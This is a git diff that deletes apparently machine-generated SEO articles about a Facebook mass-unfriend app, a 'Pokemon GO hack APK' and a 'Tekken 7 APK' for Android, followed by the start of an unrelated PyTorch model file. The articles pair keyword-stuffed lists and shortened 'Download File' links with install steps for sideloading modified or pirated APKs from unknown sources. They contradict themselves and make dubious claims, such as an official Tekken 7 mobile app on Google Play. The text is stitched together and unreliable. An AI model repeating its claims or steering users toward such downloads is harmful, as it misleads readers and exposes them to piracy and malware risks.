-How to troubleshoot issues with Friend Remover for Facebook app
-How to share All Friends Remover for Facebook extension with others
-How to rate and review Friend Remover for Facebook app on Google Play Store
-How to get support for All Friends Remover for Facebook extension
-How to report bugs or errors with Friend Remover for Facebook app
-How to delete all inactive or fake friends on Facebook
-How to remove all friends from a specific group or page on Facebook
-How to delete all pending friend requests on Facebook
-How to remove all blocked or restricted friends on Facebook
-How to delete all mutual friends on Facebook
-How to remove all suggested friends on Facebook
-How to delete all tagged or mentioned friends on Facebook
-How to remove all followers or following on Facebook
-How to delete all birthday or anniversary reminders on Facebook
-How to remove all game or app invitations on Facebook
-How to delete all chat or message history on Facebook
-How to remove all likes or reactions on Facebook posts or comments
-How to delete all comments or replies on Facebook posts or comments
-How to remove all notifications or alerts on Facebook
-How to delete all photos or videos on Facebook
-How to remove all albums or stories on Facebook
-How to delete all posts or status updates on Facebook
-How to remove all groups or pages on Facebook
-How to delete all events or check-ins on Facebook
-How to remove all bookmarks or saved items on Facebook
-Pros
-
-- It saves you time and effort. You don't have to unfriend each friend individually, which can be very tedious and time-consuming.
-- It improves your privacy and security. You can reduce the amount of personal information that you share with your Facebook friends, who may not be trustworthy or respectful of your privacy. You can also avoid unwanted messages, notifications, or requests from your Facebook friends.
-- It declutters your social media. You can get rid of the people who don't add value to your life, who annoy you with their posts, or who you don't care about anymore. You can focus on the people who matter to you, or start fresh with a new account.
-
-Cons
-
-- It may cause some problems or misunderstandings. Some of your friends may not understand why you unfriended them, and may feel hurt or offended. They may think that you are angry with them, or that you don't like them anymore. They may also try to contact you or confront you about it.
-- It may affect your online reputation or relationships. Some of your friends may be important for your personal or professional life, and unfriending them may damage your reputation or relationships. For example, if you unfriend your boss, your co-workers, or your clients, they may think that you are unprofessional or disrespectful.
-- It may not be reversible or reliable. Once you unfriend someone on Facebook, you cannot undo it unless you send them a friend request again and they accept it. However, they may not accept it, or they may not even see it if they have blocked you or changed their settings. Also, the app may not work properly or may fail to unfriend some of your friends due to technical issues or errors.
-
-Alternatives to All Friends Remover for Facebook APK
-If you are looking for other ways to unfriend your Facebook friends, there are some alternatives to All Friends Remover for Facebook APK that you can try. Here are some of them:
-Facebook Unfriend Tool
-This is a Chrome extension that allows you to unfriend all your Facebook friends in one click. It works similarly to All Friends Remover for Facebook APK, but it requires a Chrome browser and a PC. You can download it from [Chrome Web Store].
-Friend Remover PRO - Delete All Friends
-This is another Chrome extension that allows you to unfriend all your Facebook friends in one click. It also has some additional features, such as filtering by gender, country, or activity level. You can download it from [Chrome Web Store].
-Unfriend All Friends For Facebook
-This is another Android app that allows you to unfriend all your Facebook friends in one click. It has a simple interface and a fast performance. You can download it from [APKPure].
-Conclusion
-All Friends Remover for Facebook APK is an Android app that allows you to unfriend all your Facebook friends in just two clicks. It is fast, easy to use, and reliable. It can help you save time and effort, as well as improve your privacy and security on Facebook. However, it also has some drawbacks and risks, such as causing problems or misunderstandings with your friends, affecting your online reputation or relationships, or not being reversible or reliable. Therefore, you should use it with caution and discretion. You should also consider some alternatives to All Friends Remover for Facebook APK, such as Facebook Unfriend Tool, Friend Remover PRO - Delete All Friends, or Unfriend All Friends For Facebook. These are some other apps or extensions that can help you unfriend your Facebook friends in one click, with some additional features or options.
-FAQs
-Here are some frequently asked questions about All Friends Remover for Facebook APK:
-Is All Friends Remover for Facebook APK safe to use?
-All Friends Remover for Facebook APK is generally safe to use, as it does not contain any malware or viruses. However, it is not developed or endorsed by Facebook, and it requires your login credentials and permissions to access your friends list and unfriend them. Therefore, you should be careful when using any third-party app that asks for your personal information or access to your account, as they may pose some security risks or violate Facebook's terms of service.
-Can I undo the unfriending action after using All Friends Remover for Facebook APK?
-No, you cannot undo the unfriending action after using All Friends Remover for Facebook APK. Once you unfriend someone on Facebook, you cannot add them back unless you send them a friend request again and they accept it. However, they may not accept it, or they may not even see it if they have blocked you or changed their settings. Therefore, you should think carefully before using All Friends Remover for Facebook APK, and make sure that you really want to unfriend all your friends.
-Will my friends know that I unfriended them using All Friends Remover for Facebook APK?
-No, your friends will not know that you unfriended them using All Friends Remover for Facebook APK. The app does not send any notification or message to your friends when you unfriend them. However, they may notice that you are no longer on their friends list, or that they cannot see your posts or profile anymore. They may also try to visit your profile and see that you are no longer connected. Therefore, they may figure out that you unfriended them, and they may feel hurt or offended by your action.
-Will All Friends Remover for Facebook APK delete my Facebook account?
-No, All Friends Remover for Facebook APK will not delete your Facebook account. The app only removes your friends from your account, but it does not affect any other aspect of your account. You can still use your account normally after using the app, and you can still add new friends if you want to. However, if you want to delete your account completely, you will need to do it manually from the Facebook settings.
-How can I contact the developer of All Friends Remover for Facebook APK?
-The developer of All Friends Remover for Facebook APK is unknown, and there is no official website or contact information for the app. The app is distributed by third-party sources, such as [APKCombo], which do not provide any support or warranty for the app. Therefore, if you have any questions or issues with the app, you may not be able to contact the developer or get any help.
197e85843d
-
-
\ No newline at end of file
diff --git a/spaces/1phancelerku/anime-remove-background/Download Pokemon GO Hack APK and Catch Them All with Ease.md b/spaces/1phancelerku/anime-remove-background/Download Pokemon GO Hack APK and Catch Them All with Ease.md
deleted file mode 100644
index b1e5f81a19ed460b88f863cc98900718093bad34..0000000000000000000000000000000000000000
--- a/spaces/1phancelerku/anime-remove-background/Download Pokemon GO Hack APK and Catch Them All with Ease.md
+++ /dev/null
@@ -1,115 +0,0 @@
-
-How to Download Hack Pokemon Go APK
-Pokemon Go is a popular mobile game that uses augmented reality to let you catch, train, and battle virtual creatures in the real world. The game has millions of fans around the world who enjoy exploring new places, collecting items, and joining raids with other players. But what if you want to have an edge over your rivals and access more features and benefits in the game? That's where Pokemon Go hack APK comes in.
-Pokemon Go hack APK is a modified version of the original game that allows you to cheat and bypass some of the game's limitations. With this hack, you can teleport to any location, use a joystick to move around, auto-walk to hatch eggs, catch rare and legendary Pokemon, get unlimited items and coins, and more. Sounds tempting, right? But before you download and install Pokemon Go hack APK, you should be aware of the risks and dangers involved, as well as the legal issues that may arise from using it. In this article, we will explain everything you need to know about Pokemon Go hack APK, including its features, tips and tricks, risks and dangers, and legal issues.
-download hack pokemon go apk
Download File ✦ https://jinyurl.com/2uNKQ6
- Features of Pokemon Go Hack APK
-Pokemon Go hack APK has many features that can enhance your gaming experience and make you a better trainer. Here are some of the most notable ones:
-Teleport, joystick, and auto-walk
-One of the main features of Pokemon Go hack APK is that it allows you to teleport to any location in the world without actually moving. This means you can catch Pokemon that are exclusive to certain regions, visit PokeStops and gyms that are far away, and participate in events that are not available in your area. You can also use a joystick to move around the map without walking, which can save you time and energy. And if you want to hatch eggs without moving a muscle, you can use the auto-walk feature that will make your character walk automatically.
-Catch rare and legendary Pokemon
-Another feature of Pokemon Go hack APK is that it enables you to catch rare and legendary Pokemon that are normally hard to find or require special conditions to appear. For example, you can catch Mewtwo, Lugia, Ho-Oh, Rayquaza, Giratina, Kyurem, and other powerful Pokemon that are usually only available in raids or special events. You can also catch shiny Pokemon that have different colors than normal ones. With this hack, you can fill up your Pokedex faster and easier than ever.
-Get unlimited items and coins
-A third feature of Pokemon Go hack APK is that it gives you unlimited items and coins that you can use in the game. Items include Poke Balls, berries, potions, revives, incense, lures, lucky eggs, incubators, raid passes, etc. Coins are the in-game currency that you can use to buy items or upgrade your storage space. With this hack, you don't have to worry about running out of items or coins or spending real money on them.
- Tips and Tricks for Playing Pokemon Go Hack APK
-Pokemon Go hack APK can make your game more fun and exciting, but you should also be careful and smart when using it. Here are some tips and tricks that can help you play Pokemon Go hack APK safely and effectively:
-Delete difficult tasks and claim rewards one by one
-One of the tips for playing Pokemon Go hack APK is to delete the tasks that are too hard or time-consuming to complete, such as catching a certain number of Pokemon, walking a certain distance, or battling in a gym. You can do this by tapping on the bin icon next to the task in the Today or Field section of the game. This will free up space for new tasks that may be easier or more rewarding. You can also claim the rewards for each task one by one, instead of claiming them all at once. This will prevent you from getting banned or detected by the game's anti-cheat system, as it will look more natural and realistic.
-download pokemon go mod apk with fake gps
-how to get pokemon go hack apk for android
-pokemon go joystick hack apk download free
-pokemon go radar hack apk download latest version
-download pokemon go spoofing apk with hack menu
-pokemon go hack apk no root download 2023
-pokemon go fly gps hack apk download for ios
-pokemon go hack apk download unlimited coins and balls
-pokemon go adventure sync hack apk download
-pokemon go shiny hack apk download 2023
-download pokemon go mod apk with anti ban
-pokemon go hack apk download for pc windows 10
-pokemon go buddy hack apk download free
-pokemon go egg hatch hack apk download 2023
-pokemon go candy hack apk download latest version
-download pokemon go mod apk with teleport
-how to install pokemon go hack apk on android
-pokemon go speed hack apk download free
-pokemon go map hack apk download 2023
-download pokemon go spoofing apk with joystick
-pokemon go iv checker hack apk download
-pokemon go ar mode hack apk download for ios
-pokemon go weather boost hack apk download
-pokemon go trade hack apk download 2023
-download pokemon go mod apk with fast catch trick
-how to update pokemon go hack apk on android
-pokemon go location spoofing hack apk download free
-pokemon go gym battle hack apk download 2023
-download pokemon go mod apk with dark mode
-how to uninstall pokemon go hack apk on android
-pokemon go pvp battle hack apk download free
-pokemon go quest hack apk download 2023
-download pokemon go mod apk with auto walk
-how to use pokemon go hack apk on android
-pokemon go lucky patcher hack apk download free
-pokemon go team rocket hack apk download 2023
-download pokemon go mod apk with unlimited rare candy
-how to fix pokemon go hack apk on android
-pokemon go incense hack apk download free
-pokemon go stardust hack apk download 2023
-Save Stardust and build XP with Lucky Eggs
-Another tip for playing Pokemon Go hack APK is to save your Stardust and use it wisely. Stardust is a valuable resource that you need to power up and evolve your Pokemon. You can get Stardust by catching Pokemon, hatching eggs, completing tasks, participating in raids, etc. However, you should not spend it on every Pokemon you catch, as some of them may not be worth it or may be replaced by better ones later. You should only use Stardust on the Pokemon that have high IVs (individual values), high CP (combat power), and useful movesets. You can check these stats by using an app like Poke Genie or Calcy IV. You should also use Lucky Eggs to boost your XP (experience points) and level up faster. Lucky Eggs are items that double your XP for 30 minutes. You can get them by leveling up, completing tasks, or buying them with coins. You should use Lucky Eggs when you have a lot of Pokemon to evolve, as each evolution gives you 500 XP (or 1000 XP with a Lucky Egg). You can also use Lucky Eggs when you participate in raids, catch rare Pokemon, or complete special tasks.
-Throw Pokeballs correctly and catch legendary Pokemon
-A third tip for playing Pokemon Go hack APK is to throw your Pokeballs correctly and catch legendary Pokemon. Throwing Pokeballs is an art that requires skill and practice. You should aim for the center of the circle that appears around the Pokemon, as this will increase your chances of hitting it and catching it. You should also try to throw curveballs, which are balls that spin in the air before landing. Curveballs give you a bonus XP and increase your catch rate. You can throw curveballs by spinning the ball in a circular motion before releasing it. You should also use different types of balls depending on the difficulty of the Pokemon. For example, you should use Great Balls or Ultra Balls for rare or strong Pokemon, and Master Balls for legendary Pokemon. Legendary Pokemon are the most powerful and sought-after Pokemon in the game. They include Mewtwo, Lugia, Ho-Oh, Rayquaza, Giratina, Kyurem, etc. You can catch legendary Pokemon by participating in raids or using the teleport feature of Pokemon Go hack APK. However, you should be careful when doing so, as legendary Pokemon are very hard to catch and may flee if you fail.
- Risks and Dangers of Playing Pokemon Go Hack APK
-Pokemon Go hack APK may sound like a dream come true for many players, but it also comes with many risks and dangers that you should be aware of. Here are some of the most common ones:
-Accidents and injuries
-One of the risks of playing Pokemon Go hack APK is that it may cause accidents and injuries to yourself or others. Even though you are using a hack that allows you to teleport or move around without walking, you still need to pay attention to your surroundings and be careful where you go. You may encounter obstacles, hazards, or dangers that may harm you or others. For example, you may trip over a curb, fall down a stairs, bump into a wall, cross a busy street, enter a restricted area, etc. You may also damage your device or lose your internet connection if you go to places that have poor signal or coverage. To avoid these risks, you should always look where you are going, follow the traffic rules, respect the property rights, and stay alert and aware.
-Muggings and trespassing
-Another risk of playing Pokemon Go hack APK is that it may expose you to muggings and trespassing. Even though you are using a hack that allows you to catch rare and legendary Pokemon without traveling far away, you still need to be careful about your personal safety and security. You may attract unwanted attention or suspicion from other people who may see you playing the game or holding your device. You may also encounter criminals or scammers who may try to rob you, hack you, or trick you into giving them your personal information or money. For example, you may be lured into a trap, followed by a stranger, offered a fake deal, or sent a phishing link. To avoid these risks, you should always play in public and well-lit places, avoid shady or unfamiliar areas, keep your device and account secure, and report any suspicious or illegal activity.
-Privacy and data breaches
-A third risk of playing Pokemon Go hack APK is that it may compromise your privacy and data. Even though you are using a hack that allows you to spoof your location and access more features and benefits in the game, you still need to be wary of the potential consequences of doing so. You may violate the terms of service and privacy policy of the game, which may result in your account being banned or deleted. You may also expose your personal information and data to third parties who may use it for malicious purposes. For example, you may reveal your real location, identity, contacts, preferences, habits, etc. You may also download malware or viruses that may harm your device or steal your data. To avoid these risks, you should always read and understand the terms and conditions and privacy policy of the game, use a VPN (virtual private network) or a burner email to hide your IP address and identity, and scan your device and files for any threats.
- Legal Issues of Playing Pokemon Go Hack APK
-Pokemon Go hack APK may not only pose risks and dangers to yourself and others, but it may also raise legal issues that you should be aware of. Here are some of the most common ones:
-Liability for personal injury and property damage
-One of the legal issues of playing Pokemon Go hack APK is that it may make you liable for personal injury and property damage that you or others may cause or suffer while playing the game. Even though you are using a hack that allows you to teleport or move around without walking, you still need to be responsible for your actions and behavior. You may injure yourself or others, or damage someone else's property, as a result of playing the game. For example, you may crash into a car, hit a pedestrian, break a window, knock over a vase, etc. You may also be sued by the injured party or the property owner for compensation or damages. To avoid these legal issues, you should always follow the law and respect the rights of others, avoid causing harm or damage to anyone or anything, and have insurance or funds to cover any potential liability.
-Intellectual property infringement and piracy
-Another legal issue of playing Pokemon Go hack APK is that it may constitute intellectual property infringement and piracy. Intellectual property refers to the creations of the mind, such as inventions, designs, logos, names, etc. Piracy refers to the unauthorized use or distribution of someone else's intellectual property without their permission or consent. Pokemon Go hack APK is a modified version of the original game that belongs to Niantic Inc., The Pokemon Company, and Nintendo Co., Ltd. By downloading and installing Pokemon Go hack APK, you are infringing and pirating their intellectual property rights, which may result in legal action or penalties. For example, you may be sued for damages, fined, or jailed for violating the law. You may also be banned or blocked from accessing the game or its services. To avoid these legal issues, you should respect the intellectual property rights of the game developers and owners, and only use the official version of the game that is authorized and licensed by them.
-Augmented reality regulation and virtual currency taxation
-A third legal issue of playing Pokemon Go hack APK is that it may involve augmented reality regulation and virtual currency taxation. Augmented reality refers to the technology that overlays digital information or images on the physical world, such as Pokemon Go. Virtual currency refers to the digital money that is used in online games or platforms, such as coins in Pokemon Go. Both augmented reality and virtual currency are relatively new and emerging phenomena that may not have clear or consistent laws or regulations in different countries or jurisdictions. By playing Pokemon Go hack APK, you may be subject to different rules or requirements that may affect your rights and obligations. For example, you may need a permit or license to use augmented reality in certain places or situations, or you may need to pay taxes on your virtual currency transactions or income. To avoid these legal issues, you should be aware of and comply with the laws and regulations that apply to augmented reality and virtual currency in your location or destination.
- Conclusion
-Pokemon Go hack APK is a tempting option for many players who want to enjoy more features and benefits in the game. However, it also comes with many risks and dangers that may harm yourself or others, as well as legal issues that may result in serious consequences. Therefore, you should think twice before downloading and installing Pokemon Go hack APK, and weigh the pros and cons carefully. You should also follow the tips and tricks that we have provided to play Pokemon Go hack APK safely and effectively. Remember, Pokemon Go is a game that is meant to be fun and fair for everyone, so don't ruin it for yourself or others by cheating or hacking.
- FAQs
-Here are some of the frequently asked questions about Pokemon Go hack APK:
-Q: Where can I download Pokemon Go hack APK?
-A: You can download Pokemon Go hack APK from various websites or sources online, but you should be careful and cautious when doing so. Some of these websites or sources may be unreliable, untrustworthy, or illegal, and may contain malware or viruses that may harm your device or data. You should only download Pokemon Go hack APK from reputable and verified websites or sources that have positive reviews and feedback from other users.
-Q: How can I install Pokemon Go hack APK?
-A: You can install Pokemon Go hack APK by following these steps:
-
-- Download the Pokemon Go hack APK file from a reliable and verified website or source.
-- Go to your device's settings and enable the option to install apps from unknown sources.
-- Locate the downloaded file in your device's storage and tap on it to start the installation process.
-- Follow the instructions on the screen and grant the necessary permissions to the app.
-- Wait for the installation to finish and launch the app.
-
-Q: How can I update Pokemon Go hack APK?
-A: You can update Pokemon Go hack APK by following these steps:
-
-- Go to the website or source where you downloaded the Pokemon Go hack APK file and check if there is a new version available.
-- If there is a new version available, download it to your device.
-- Uninstall the old version of Pokemon Go hack APK from your device.
-- Install the new version of Pokemon Go hack APK by following the same steps as above.
-
-Q: Is Pokemon Go hack APK safe?
-A: No, Pokemon Go hack APK is not safe. It may cause accidents and injuries to yourself or others, expose you to muggings and trespassing, compromise your privacy and data, violate the terms of service and privacy policy of the game, infringe and pirate the intellectual property rights of the game developers and owners, and subject you to different laws and regulations regarding augmented reality and virtual currency. It may also result in your account being banned or deleted by the game's anti-cheat system. Therefore, you should avoid using Pokemon Go hack APK at all costs.
-Q: Is there a legal way to play Pokemon Go with more features and benefits?
-A: Yes, there is a legal way to play Pokemon Go with more features and benefits without using Pokemon Go hack APK. You can do this by following these steps:
-
-- Download and install the official version of Pokemon Go from the Google Play Store or the Apple App Store.
-- Create an account and choose your avatar and team.
-- Start playing the game by exploring your surroundings, catching Pokemon, collecting items, joining raids, etc.
-- Earn coins by defending gyms or completing tasks, and use them to buy items or upgrade your storage space.
-- Join a community of Pokemon Go players online or offline, and share tips, tricks, news, events, etc.
-- Participate in special events and promotions that may offer more features and benefits, such as discounts, bonuses, rewards, etc.
-
-By playing Pokemon Go legally, you can enjoy the game more and avoid the risks and dangers of Pokemon Go hack APK. You can also support the game developers and owners who work hard to create and maintain the game for you.
401be4b1e0
-
-
\ No newline at end of file
diff --git a/spaces/1phancelerku/anime-remove-background/Download Tekken 7 APK and Enjoy the Best Fighting Experience on Android.md b/spaces/1phancelerku/anime-remove-background/Download Tekken 7 APK and Enjoy the Best Fighting Experience on Android.md
deleted file mode 100644
index 3bdbb5e27fb7e43f11bfbdaf2fc3162c860f2f6f..0000000000000000000000000000000000000000
--- a/spaces/1phancelerku/anime-remove-background/Download Tekken 7 APK and Enjoy the Best Fighting Experience on Android.md
+++ /dev/null
@@ -1,123 +0,0 @@
-
-Tekken 7 Download Android: How to Play the Ultimate Fighting Game on Your Smartphone
-If you are a fan of fighting games, you have probably heard of Tekken, one of the most iconic and successful franchises in the genre. The latest installment, Tekken 7, is a masterpiece of action-packed, cinematic, and competitive gameplay that will keep you hooked for hours.
-tekken 7 download android
Download File ⏩ https://jinyurl.com/2uNTpX
-But did you know that you can also play Tekken 7 on your Android device? Yes, you read that right. You can enjoy the thrill of Tekken 7 anytime, anywhere, on your smartphone or tablet. In this article, we will show you how to download and install Tekken 7 for Android, how to play it like a pro, and how to enjoy it to the fullest.
-What is Tekken 7?
-Tekken 7 is a fighting game developed by Bandai Namco Studios and published by Bandai Namco Entertainment. It is the ninth main entry in the Tekken series, which started in 1994 as an arcade game.
-Tekken 7 follows the story of the Mishima clan, a powerful family that is involved in a long-running feud over control of the world. The game features over 50 characters from different countries and backgrounds, each with their own fighting style, personality, and motivation. Some of them are new to the series, such as Akuma from Street Fighter, while others are returning favorites, such as Jin Kazama, Nina Williams, and King.
-Tekken 7 was released for arcade machines in Japan in March 2015, and later received updates that added new characters, stages, modes, and features. The game was port ed to PlayStation 4, Xbox One, and Windows PC in June 2017, and received positive reviews from critics and players alike. The game has sold over 7 million copies worldwide as of March 2021, making it one of the best-selling fighting games of all time.
-tekken 7 apk download for android latest version 2022
-tekken 7 android game free download full version
-tekken 7 mobile apk + obb download for android
-how to download tekken 7 on android phone
-tekken 7 ppsspp iso download for android highly compressed
-tekken 7 mod apk download for android unlimited money
-tekken 7 android offline download
-tekken 7 apk + data download for android
-tekken 7 android game download apk pure
-tekken 7 apk download for android offline mode
-tekken 7 android game size
-tekken 7 android requirements
-tekken 7 android gameplay
-tekken 7 android characters
-tekken 7 android cheats
-tekken 7 android online multiplayer
-tekken 7 android best settings
-tekken 7 android controller support
-tekken 7 android tips and tricks
-tekken 7 android review
-t7 chicken plus app for tekken 7 android
-tekken 7 frame data app android
-tekken 7 combo list app android
-tekken 7 move list app android
-tekken 7 tier list app android
-tekken 7 guide app android
-best app for learning tekken 7 android
-how to use t7 chicken plus app for tekken 7 android
-t7 chicken plus app for tekken 7 android download
-t7 chicken plus app for tekken 7 android apk
-What are the Features of Tekken 7?
-Stunning Graphics and Cinematics
-One of the most impressive aspects of Tekken 7 is its graphics and cinematics, which are powered by Unreal Engine 4. The game boasts realistic and detailed character models, animations, and environments, as well as dynamic lighting and shadows, particle effects, and reflections. The game also features seamless transitions between gameplay and cutscenes, creating a cinematic experience that immerses you in the story and the action.
-Diverse and Customizable Roster
-Another feature that makes Tekken 7 stand out is its diverse and customizable roster of fighters. The game offers over 50 characters to choose from, each with their own unique moves, combos, strengths, and weaknesses. You can also customize your characters with various outfits, accessories, hairstyles, tattoos, and more, to express your personality and style. You can even create your own original characters using the Character Creation mode, which lets you mix and match different parts and features from existing characters.
-Innovative and Accessible Combat System
-The core of Tekken 7 is its innovative and accessible combat system, which is designed to appeal to both casual and hardcore fans of fighting games. The game introduces new mechanics and modes that add depth and variety to the gameplay, such as:
-
-- Rage Art: A powerful attack that can be activated when your health is low, allowing you to deal massive damage and turn the tide of the battle.
-- Power Crush: A special move that can absorb incoming attacks and continue with your own, giving you an advantage in offensive situations.
-- Frame Data Display: An optional feature that shows you the frame data of each move, such as startup, recovery, advantage, and disadvantage, helping you to improve your skills and strategies.
-- Online Battles: A mode that lets you compete with other players from around the world in ranked or casual matches, or join online tournaments with up to eight participants.
-
-How to Download Tekken 7 for Android?
-Tekken 7 Apk Download for Android (Latest Version) 2022
-If you want to play Tekken 7 on your Android device without any restrictions or limitations, you can download the Tekken 7 apk file from a reliable source. This is a modified version of the game that allows you to enjoy all the features and content of the original game on your smartphone or tablet. To download and install the Tekken 7 apk file for Android, follow these steps:
-
-- Go to the website where you can download the Tekken 7 apk file, and click on the download button.
-- Wait for the download to finish, and then locate the file on your device.
-- Before installing the file, make sure that you have enabled the option to install apps from unknown sources on your device settings.
-- Tap on the file to start the installation process, and follow the instructions on the screen.
-- Once the installation is complete, launch the game and enjoy playing Tekken 7 on your Android device.
-
-The benefits of using this method are:
-
-- You can play Tekken 7 on your Android device without any internet connection or data usage.
-- You can access all the characters, stages, modes, and features of Tekken 7 without any restrictions or in-app purchases.
-- You can customize your game settings according to your preferences and device performance.
-
Tekken 7 Mobile Download for Android (Official Version) 2022
-If you prefer to play the official version of Tekken 7 on your Android device, you can download the Tekken 7 mobile app from the Google Play Store. This is a simplified and optimized version of the game that is designed to run smoothly on mobile devices. To download and install the Tekken 7 mobile app for Android, follow these steps:
-
-- Go to the Google Play Store on your device, and search for Tekken 7.
-- Select the app from the list of results, and tap on the install button.
-- Wait for the app to download and install on your device.
-- Launch the app and sign in with your Bandai Namco account or create a new one.
-- Start playing Tekken 7 on your Android device.
-
-The features and limitations of this version are:
-
-- You need an internet connection and data usage to play Tekken 7 on your Android device.
-- You have limited access to some of the characters, stages, modes, and features of Tekken 7, and you need to unlock them with in-app purchases or by completing missions.
-- You have to adjust your game settings according to the default options and device compatibility.
-
-How to Play Tekken 7 on Android?
-Tips and Tricks for Beginners
-If you are new to Tekken 7 or fighting games in general, you might feel overwhelmed by the complexity and difficulty of the game. But don't worry, we have some tips and tricks for beginners that will help you get started and improve your skills. Here are some of them:
-
-- Learn the moves: The first thing you need to do is to learn the basic moves of each character, such as punches, kicks, throws, blocks, and dodges. You can find the move list in the pause menu or in the training mode. You can also watch some tutorials or guides online that will teach you how to perform each move and when to use them.
-- Practice in training mode: The best way to practice your moves and combos is to use the training mode, which lets you choose any character, stage, and opponent. You can also customize the settings, such as the difficulty, health, and behavior of the opponent. You can also use the frame data display feature to see how each move works and how to counter them.
-- Adjust the settings: Another thing you need to do is to adjust the game settings according to your preferences and device performance. You can change the graphics quality, sound volume, control layout, camera angle, and more. You can also enable or disable some features, such as auto-combo, rage art, power crush, and frame data display.
-
Tips and Tricks for Advanced Players
-If you are already familiar with Tekken 7 or fighting games in general, you might want to take your skills to the next level and challenge yourself with more advanced techniques and strategies. Here are some tips and tricks for advanced players that will help you master the game and dominate your opponents:
-
-- Master the combos: The key to winning in Tekken 7 is to execute powerful and effective combos that can deal a lot of damage and stun your opponent. You can learn the combos of each character from the move list, the training mode, or online sources. You can also create your own combos by combining different moves and experimenting with different timings and distances.
-- Use the frame data: One of the most useful features of Tekken 7 is the frame data display, which shows you the frame data of each move, such as startup, recovery, advantage, and disadvantage. You can use this information to understand how each move works and how to counter them. You can also use it to find openings, punish mistakes, and create pressure.
-- Join online tournaments: One of the most exciting and rewarding ways to play Tekken 7 is to join online tournaments, which let you compete with other players from around the world in ranked or casual matches. You can also create your own tournaments with up to eight participants. You can earn rewards, rankings, and trophies by participating in online tournaments, as well as improve your skills and reputation.
-
-How to Enjoy Tekken 7 on Android?
-Review and Rating of Tekken 7
-Tekken 7 is widely regarded as one of the best fighting games ever made, and it has received rave reviews from critics and players alike. The game has an average score of 82 out of 100 on Metacritic, based on 91 reviews from various sources. The game has also received a user score of 8.1 out of 10 on Metacritic, based on 1,028 ratings from players.
-Some of the praises that Tekken 7 has received are:
-
-- "Tekken 7 is a hallmark fighting game that's both accessible and highly technical, offering a diverse cast of characters and a robust suite of modes." - IGN
-- "Tekken 7 is one of the most fun fighting games I've ever played. It's fast-paced, flashy, strategic, and satisfying." - Game Informer
-- "Tekken 7 is a fantastic fighting game experience that offers something for everyone." - GamesRadar+
-
-Comparison with Other Fighting Games on Android
-Tekken 7 is not the only fighting game that you can play on your Android device. There are many other fighting games available on the Google Play Store that offer different features, styles, and experiences. Here are some of the most popular fighting games on Android that you can compare with Tekken 7:
- | Game | Features | Pros | Cons | | --- | --- | --- | --- | | Street Fighter IV Champion Edition | - Classic 2D fighting game with 32 characters from the Street Fighter series.
- Three control options: virtual pad, arcade stick, or Bluetooth controller.
- Online multiplayer mode with cross-platform support.
- Arcade mode, training mode, survival mode, and challenge mode.
- Customizable graphics settings. | - Smooth and responsive gameplay.
- Iconic and diverse characters.
- High replay value.
- Great sound effects and music. | - Requires internet connection.
- Some characters require in-app purchases.
- No story mode.
- Occasional lag and connection issues. | | Mortal Kombat | - Brutal 3D fighting game with over 130 characters from the Mortal Kombat universe.
- Fatalities, X-Rays, and Brutalities for each character.
- Online multiplayer mode with faction wars, team battles, and leaderboards.
- Story mode, tower mode, challenge mode, and relic hunt mode.
- Customizable equipment and abilities for each character. | - Stunning graphics and animations.
- Intense and visceral combat.
- Engaging and immersive story.
- Generous rewards and content. | - Requires internet connection.
- High device requirements.
- Frequent updates and patches.
- Grindy and pay-to-win aspects. | | Injustice 2 | - Superhero 3D fighting game with over 40 characters from the DC Comics universe.
- Super Moves, Special Attacks, and Gear System for each character.
- Online multiplayer mode with arena battles, leagues, raids, and chat.
- Story mode, operations mode, challenges mode , and events mode.
- Customizable graphics settings. | - Impressive graphics and cinematics.
- Fun and varied gameplay.
- Rich and compelling story.
- Lots of modes and features. | - Requires internet connection.
- High device requirements.
- Long loading times.
- Expensive and limited in-app purchases. | As you can see, each game has its own strengths and weaknesses, and it ultimately depends on your personal preference and taste. However, we believe that Tekken 7 is the best fighting game on Android, because it offers a balanced and satisfying experience that combines stunning graphics, diverse characters, innovative combat, and online tournaments.
-Conclusion
-Tekken 7 is a game that every fighting game fan should play, especially on their Android device. It is a game that delivers on every aspect, from the graphics and cinematics, to the characters and combat, to the modes and features. It is a game that will challenge you, entertain you, and inspire you.
-If you want to play Tekken 7 on your Android device, you have two options: you can download the Tekken 7 apk file from a reliable source, or you can download the official Tekken 7 mobile app from the Google Play Store. Either way, you will be able to enjoy the ultimate fighting game on your smartphone or tablet.
-So what are you waiting for? Download Tekken 7 for Android today, and unleash your inner fighter!
-FAQs
-Here are some of the frequently asked questions about Tekken 7 download android:
-
-- Q: Is Tekken 7 free to play on Android?
A: Yes, both the Tekken 7 apk file and the official Tekken 7 mobile app are free to download and play on Android devices. However, some characters, stages, modes, and features may require in-app purchases or unlocking by completing missions.
-- Q: Is Tekken 7 safe to download on Android?
A: Yes, as long as you download the Tekken 7 apk file or the official Tekken 7 mobile app from a reliable and trusted source. You should also scan the file or app with an antivirus software before installing it on your device.
-- Q: Is Tekken 7 compatible with my Android device?
A: The Tekken 7 apk file is compatible with most Android devices that have at least 2 GB of RAM and 4 GB of storage space. The official Tekken 7 mobile app is compatible with Android devices that have at least Android 5.0 (Lollipop) and 1 GB of RAM.
-- Q: How can I update Tekken 7 on my Android device?
A: If you downloaded the Tekken 7 apk file, you will need to download the latest version of the file from the same source and install it over the existing one. If you downloaded the official Tekken 7 mobile app, you will need to update it from the Google Play Store when a new version is available.
-- Q: How can I contact the developers of Tekken 7?
A: If you have any questions, feedback, or issues regarding Tekken 7, you can contact the developers of Tekken 7 by visiting their official website, their Facebook page, their Twitter account, or their YouTube channel.
-
197e85843d
-
-
\ No newline at end of file
diff --git a/spaces/801artistry/RVC801/infer/lib/uvr5_pack/lib_v5/nets_new.py b/spaces/801artistry/RVC801/infer/lib/uvr5_pack/lib_v5/nets_new.py
deleted file mode 100644
index 1c0f4fa96d921e979fe31bd4151701b7783fbcea..0000000000000000000000000000000000000000
--- a/spaces/801artistry/RVC801/infer/lib/uvr5_pack/lib_v5/nets_new.py
+++ /dev/null
@@ -1,133 +0,0 @@
-import torch
-import torch.nn.functional as F
-from torch import nn
-
-from . import layers_new
-
-
-class BaseNet(nn.Module):
- def __init__(
- self, nin, nout, nin_lstm, nout_lstm, dilations=((4, 2), (8, 4), (12, 6))
- ):
- super(BaseNet, self).__init__()
- self.enc1 = layers_new.Conv2DBNActiv(nin, nout, 3, 1, 1)
- self.enc2 = layers_new.Encoder(nout, nout * 2, 3, 2, 1)
- self.enc3 = layers_new.Encoder(nout * 2, nout * 4, 3, 2, 1)
- self.enc4 = layers_new.Encoder(nout * 4, nout * 6, 3, 2, 1)
- self.enc5 = layers_new.Encoder(nout * 6, nout * 8, 3, 2, 1)
-
